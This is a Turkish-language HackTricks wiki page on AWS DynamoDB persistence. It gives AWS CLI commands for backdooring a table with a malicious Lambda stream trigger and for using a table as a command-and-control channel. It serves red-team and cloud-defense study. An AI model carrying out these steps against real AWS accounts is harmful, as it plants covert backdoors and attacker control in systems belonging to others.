AWS - DynamoDB Persistence

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

DynamoDB

Daha fazla bilgiye erişim:

AWS - DynamoDB Enum

Lambda Arka Kapısı ile DynamoDB Tetikleyicileri

DynamoDB tetikleyicilerini kullanarak, bir saldırgan bir tabloya kötü niyetli bir Lambda işlevi ilişkilendirerek gizli bir arka kapı oluşturabilir. Lambda işlevi, bir öğe eklendiğinde, değiştirildiğinde veya silindiğinde tetiklenebilir, bu da saldırgana AWS hesabı içinde rastgele kod çalıştırma imkanı tanır.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Kalıcılığı sürdürmek için, saldırgan DynamoDB tablosunda öğeler oluşturabilir veya bunları değiştirebilir, bu da kötü niyetli Lambda işlevini tetikler. Bu, saldırgana Lambda işleviyle doğrudan etkileşim olmadan AWS hesabı içinde kod çalıştırma imkanı tanır.

DynamoDB C2 Kanalı Olarak

Bir saldırgan, komutlar içeren öğeler oluşturarak ve bu komutları almak ve yürütmek için ele geçirilmiş örnekler veya Lambda işlevleri kullanarak bir DynamoDB tablosunu komut ve kontrol (C2) kanalı olarak kullanabilir.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Kompromize edilmiş örnekler veya Lambda fonksiyonları, yeni komutlar için C2 tablosunu periyodik olarak kontrol edebilir, bunları çalıştırabilir ve isteğe bağlı olarak sonuçları tabloya geri raporlayabilir. Bu, saldırganın, ele geçirilmiş kaynaklar üzerinde kalıcılık ve kontrol sağlamasına olanak tanır.

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - Cognito Persistence NextAWS - EC2 Persistence

Last updated 3 days ago

# Create a malicious Lambda function aws lambda create-function \ --function-name MaliciousFunction \ --runtime nodejs14.x \ --role <LAMBDA_ROLE_ARN> \ --handler index.handler \ --zip-file fileb://malicious_function.zip \ --region <region> # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ --table-name TargetTable \ --region <region> # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ --function-name MaliciousFunction \ --event-source <STREAM_ARN> \ --region <region>

# Create a DynamoDB table for C2 aws dynamodb create-table \ --table-name C2Table \ --attribute-definitions AttributeName=CommandId,AttributeType=S \ --key-schema AttributeName=CommandId,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ --region <region> # Insert a command into the table aws dynamodb put-item \ --table-name C2Table \ --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ --region <region>